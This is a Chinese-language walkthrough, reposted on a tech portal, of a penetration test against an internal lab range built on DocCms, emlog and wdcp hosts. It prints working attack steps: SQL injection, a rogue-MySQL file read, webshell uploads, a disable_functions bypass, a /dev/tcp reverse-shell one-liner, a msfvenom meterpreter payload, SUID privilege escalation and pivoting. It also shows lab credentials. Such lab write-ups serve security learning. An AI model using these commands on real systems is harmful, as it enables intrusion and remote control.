您当前的位置:首页 > 电脑百科 > 安全防护 > 黑客技术

记一次内网靶场渗透测试

时间:2022-06-15 16:52:23  来源:  作者:星云博创

前言

最近在做内网渗透相关姿势点的总结,打了一些靶场,本次内网网络拓扑图如下所示,中等进阶难度。

记一次内网靶场渗透测试

 

测试过程

0x1:信息搜集

访问域名:

记一次内网靶场渗透测试

 

对域名解析的ip进行端口扫描:

nmap -sS --open -Pn -p- -v 192.168.0.122

记一次内网靶场渗透测试

 

网站进行目录扫描和指纹识别发现网站使用的是DocCms 2016 x1.

记一次内网靶场渗透测试

 

0x2:漏洞利用

网上搜索doccms 2016历史漏洞,说搜索功能处参数keyword存在sql注入,使用url二次编码进行绕过。

记一次内网靶场渗透测试

 

成功获取到网站admin账号密码但无法进行解密:

记一次内网靶场渗透测试

 

从网上下载源码,发现/setup/checkdb.php文件可以连接远程的MySQL,所以可以利用mysql的bug读取文件。

记一次内网靶场渗透测试

 

使用Rogue-MySql-Server读取文件:

记一次内网靶场渗透测试

 


http://www.ddd4.com/setup/checkdb.php?dbname=mysql&uname=root&pwd=123456&dbhost=192.168.0.109&action=chkdb 这里获取到了网站的物理路径。

记一次内网靶场渗透测试

 

查看mysql.log文件,成功读取到/etc/passwd:

记一次内网靶场渗透测试

 

修改server.py文件中读取文件的路径为:

/www/wwwroot/www.ddd4.com/config/doc-config-cn.php

记一次内网靶场渗透测试

 

再次查看mysql.log获取到数据库名称、用户名、密码:

www_ddd4.com

www_ddd4_com

x4ix6ZrM7b8nFYHn

记一次内网靶场渗透测试

 

前面端口扫描发现目标机器的3306端口是开放的,直接进行连接:

记一次内网靶场渗透测试

 

连接成功后,替换网站管理员admin账户的密码,查看admin/login.php,发现对密码使用加密算法进行了加密。

记一次内网靶场渗透测试

 

我们来使用加密算法class.docencryption.php,对123456进行加密。

记一次内网靶场渗透测试

 


4a8dq8y3e7c4a8d09csy9520943dcl64943941se10adc394ujba59abbe5ne057xf20f8y3e7cpwd将加密后的值进行替换。

记一次内网靶场渗透测试

 

使用密码123456登录到后台:

记一次内网靶场渗透测试

 

通过网站查找历史漏洞,可以使用模版来getshell:

记一次内网靶场渗透测试

 


记一次内网靶场渗透测试

 

这里刚开始写入普通的一句话木马,使用蚁剑连接,显示为空,但是查看phpinfo文件并没有将eval函数写入到disable_function当中,换了冰蝎可以连接成功。

记一次内网靶场渗透测试

 

但是无法执行命令,查看disable_function,禁用了很多函数。

记一次内网靶场渗透测试

 

这里使用脚本进行绕过,将文件夹里的.so文件与.php文件上传到网站的目录下面:

记一次内网靶场渗透测试

 

然后访问执行命令:

http://www.ddd4.com/bypass_disablefunc.php?cmd=id&outpath=/tmp/xx&sopath=/www/wwwroot/www.ddd4.com/bypass_disablefunc_x64.so

记一次内网靶场渗透测试

 

直接使用sh反弹shell,反弹成功但是执行命令无反应:

/bin/sh -i >& /dev/tcp/192.168.0.2/3333 0>&1

记一次内网靶场渗透测试

 

使用matespolite生成木马文件:

msfvenom -p

linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 -f elf >

/home/kali/Desktop/haha

将木马文件上传到目标主机,赋权后执行:

记一次内网靶场渗透测试

 

msf返回一个meterpreter

记一次内网靶场渗透测试

 

使用Python/ target=_blank class=infotextkey>Python返回一个交互式shell

记一次内网靶场渗透测试

 

查看文件获取到第一个flag

记一次内网靶场渗透测试

 

0x3:提权

使用find进行提权

使用命令find / -type f -perm -u=s 2>/dev/null 发现可以利用find命令来进行提权:

记一次内网靶场渗透测试

 

find . -exec whoami ; -quit 提权成功:

记一次内网靶场渗透测试

 

宝塔提权

翻看文件发现宝塔的账户密码:

记一次内网靶场渗透测试

 

登录到宝塔上,使用计划任务进行提权:

记一次内网靶场渗透测试

 


记一次内网靶场渗透测试

 

成功获取到第二个flag:

记一次内网靶场渗透测试

 

0x4:内网渗透

使用现在的root权限的shell来运行前面我们生产的木马文件,来获取一个meterpreter。

记一次内网靶场渗透测试

 

查看路由和hosts文件,发现存在10.10.10.144主机:

记一次内网靶场渗透测试

 

添加路由:

Run autoroute -s 10.10.10.0/24

Run autoroute -p

记一次内网靶场渗透测试

 

设置代理:

记一次内网靶场渗透测试

 

可以访问http://10.10.10.145:8888说明代理搭建成功。

记一次内网靶场渗透测试

 

使用msf自带的模块对10.10.10.144进行端口扫描,发现开放了21、22、80、8080端口:

记一次内网靶场渗透测试

 

浏览器代理访问www.ddd5.com弱口令进入后台,此站点使用的是emlog,网上搜索历史漏洞,发现后台可以通过上传模版来getshell。

从网上下载一个emlog模版,然后在文件里新建一个php一句话。

记一次内网靶场渗透测试

 

然后将压缩文件进行上传安装:

记一次内网靶场渗透测试

 

上传成功后,一句话文件的位置为
/content/templates/beginning/haha.php。

记一次内网靶场渗透测试

 


http://www.ddd5.com/content/templates/beginning/haha.php?cmd=id来执行系统命令。

记一次内网靶场渗透测试

 

访问8080端口:

记一次内网靶场渗透测试

 

使用默认密码wdlinux.cn无法登录,对目录扫描发现存在phpmyadmin使用默认密码登录成功,查看wdcpdb数据库,获取到admin用户的密码。

记一次内网靶场渗透测试

 

对密码进行md5解密获取到明文密码:

记一次内网靶场渗透测试

 

使用密码进行登录,发现显示登录超时,网上说是时间不同步导致的。

记一次内网靶场渗透测试

 

使用前面的一句话来查看系统当前的时间:

记一次内网靶场渗透测试

 

因为权限不够,无法修改目标机器的时间,但可以修改自己本地系统时间然后成功登录。

搜索wdcp利用方法,发现可以执行系统命令,当前用户为root。

记一次内网靶场渗透测试

 

但是无法使用bash进行反弹,然后考虑的是使用msfvenoom生产一个正向的木马文件,然后执行木马文件来上线msf,最后发现也是不行被拦截。

记一次内网靶场渗透测试

 

在安全管理-->ssh管理处生成密码,并将密钥下载下来:

记一次内网靶场渗透测试

 

利用proxychains使用ssh直接连接获取第三个falg。

记一次内网靶场渗透测试

 

总结

在测试过中发现,doccms后台也可以使用写入配置文件来拿shell,然后在绕过disable_functions 时,刚开始想的是直接使用蚁剑的插件来绕过,但失败了,只好手工来绕过disable_functions,也学习了WDCP的利用方法。



Tags:渗透测试   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
目录:1.如何找漏洞2.找到后如何挖漏洞3.漏洞如何提交只要搞渗透,不就会听到很多行业内人前辈一直在重复:“信息搜集” 信息搜集有多重要,你搜集到的多少资产信息,决定了你后续...【详细内容】
2022-06-21  Tags: 渗透测试  点击:(54)  评论:(0)  加入收藏
前言最近在做内网渗透相关姿势点的总结,打了一些靶场,本次内网网络拓扑图如下所示,中等进阶难度。 测试过程0x1:信息搜集访问域名: 对域名解析的ip进行端口扫描:nmap -sS --open -...【详细内容】
2022-06-15  Tags: 渗透测试  点击:(35)  评论:(0)  加入收藏
主动信息收集-发现 直接与目标系统交互通信 无法避免留下访问的痕迹 使用受控的第三方电脑进行探测 使用代理或已经被控制的主机 做好被封杀的准备 使用噪声迷惑目标,淹...【详细内容】
2022-04-28  Tags: 渗透测试  点击:(70)  评论:(0)  加入收藏
wireshark功能介绍1.抓包嗅探协议分析2.安全专家必备的技能3.抓包引擎Libpcap9----LinuxWinpcap10-----Windows4.解码能力 wireshark基本使用方法1.启动软件2.选择抓包网卡3...【详细内容】
2022-04-19  Tags: 渗透测试  点击:(136)  评论:(0)  加入收藏
许多的Web应用程序一般会有对服务器的文件读取查看的功能,大多会用到提交的参数来指明文件名 形如: http://www.nuanyue.com/getfile=image.jgp当服务器处理传送过来的image.j...【详细内容】
2022-03-15  Tags: 渗透测试  点击:(80)  评论:(0)  加入收藏
渗透测试在网络黑客之前寻找到可造成公司数据泄漏、资损、业务流程被伪造等困境的漏洞,公司可对漏洞开展应急处置、立即修补。防止对公司的业务流程、客户及资产造成影响。 ...【详细内容】
2022-01-25  Tags: 渗透测试  点击:(97)  评论:(0)  加入收藏
有成千上万的书籍讲解什么是信息安全,什么是渗透测试,也有数不清的培训课程视频。但是,我敢打赌,在这些材料中,只有不到10%是在写报告的事情。在一个完整的渗透测试过程中,有将近...【详细内容】
2022-01-11  Tags: 渗透测试  点击:(94)  评论:(0)  加入收藏
声明:本文仅限学习研究讨论,切忌做非法乱纪之事Web打点渗透测试中,Web端最常见的问题大多出现在弱口令、文件上传、未授权、任意文件读取、反序列化、模版漏洞等方面。因此,我...【详细内容】
2021-12-31  Tags: 渗透测试  点击:(155)  评论:(0)  加入收藏
简介在sqlmap基础上增加了目录扫描、hash爆破等功能运行环境 linux 在云服务器上还是蛮不错的项目连接如下https://github.com/s0md3v/sqlmat usage: sqlmate [-h] [--dor...【详细内容】
2021-11-10  Tags: 渗透测试  点击:(132)  评论:(0)  加入收藏
一:信息收集阶段因为目标是学校,一般会去考虑收集学号,教工号。因为有的登陆点需要此类信息,且密码存在规律性(身份证后六位,123456)。目标域名xxx.com【查看资料】开始的时候,我是...【详细内容】
2021-10-27  Tags: 渗透测试  点击:(152)  评论:(0)  加入收藏
▌简易百科推荐
绝大多数企业将大量的投资花费在网络和服务器的安全上,没有从真正意义上保证应用本身的安全,给黑客以可乘之机。当今世界, Internet(因特网)已经成为一个非常重的基础平台,很多...【详细内容】
2022-07-12  前端启明星    Tags:web渗透   点击:(8)  评论:(0)  加入收藏
前言钓鱼wifi是很久的话题了,但是传统的方法可能比较麻烦需要手动配置dhcp,dns,网卡,流量转发,比较麻烦,而且还有根据每次的网络环境需要重新的配置,这里介绍用WIFIpumpkin3工具简...【详细内容】
2022-07-12  黑客帮    Tags:钓鱼wifi   点击:(10)  评论:(0)  加入收藏
顶尖黑客组织匿名者 匿名者世界第一大邪恶黑客联盟组织,其成员遍布全世界,并且实力超强。曾入侵过美国的五角大楼、攻击过isis的网站,入侵过荷兰、英国等国家的网络系统,被世界...【详细内容】
2022-07-10  A位出道    Tags:黑客   点击:(13)  评论:(0)  加入收藏
CSRF:Cross Site Request Forgery(跨站点请求伪造)。CSRF 攻击者在用户已经登录目标网站之后,诱使用户访问一个攻击页面,利用目标网站对用户的信任,以用户身份在攻击页面对目标网...【详细内容】
2022-06-27  Java那点事    Tags:CSRF   点击:(27)  评论:(0)  加入收藏
SYN Flood是一种非常危险而常见的Dos攻击方式。到目前为止,能够有效防范SYN Flood攻击的手段并不多,SYN Cookie就是其中最著名的一种。 SYN Flood攻击原理SYN Flood攻击是一种...【详细内容】
2022-06-21  我是FEIYA    Tags:SYN Flood   点击:(41)  评论:(0)  加入收藏
前言最近在做内网渗透相关姿势点的总结,打了一些靶场,本次内网网络拓扑图如下所示,中等进阶难度。 测试过程0x1:信息搜集访问域名: 对域名解析的ip进行端口扫描:nmap -sS --open -...【详细内容】
2022-06-15  星云博创    Tags:渗透测试   点击:(35)  评论:(0)  加入收藏
零基础学黑客领资料搜公众号:白帽子左一关于原型链在javascript中,继承的整个过程就称为该类的原型链。每个对象的都有一个指向他的原型(prototype)的内部链接,这个原型对象又...【详细内容】
2022-05-20  暗网视界    Tags:nodejs   点击:(69)  评论:(0)  加入收藏
参数来源:GitHub(802) https://github.com/FastTunnel/FastTunnel来源:Gitee(2200) https://gitee.com/Hgui/FastTunnel协议:Apache-2.0 license官网:https://suidao.io/文档:htt...【详细内容】
2022-05-16  IT微部落    Tags:内网穿透   点击:(115)  评论:(0)  加入收藏
因前段时间退出了内网的学习,现在开始复习web方面的漏洞了,于是乎,开始了挖洞之旅,当我像往常一样上传冰蝎的webhsell时,发现冰蝎的马子居然被杀了.......于是便有了该文章........【详细内容】
2022-05-11  暗网视界    Tags:冰蝎   点击:(173)  评论:(0)  加入收藏
外网打点首先对web进行端口扫描,发现38080端口和22端口 访问一下38080端口发现是一个error page 用Wappalyzer看一下是什么架构,但是好像没有检测出来 拿着报错去百度上发现应...【详细内容】
2022-04-30  靓仔的二十四分之一天    Tags:靶场渗透   点击:(63)  评论:(0)  加入收藏
站内最新
站内热门
站内头条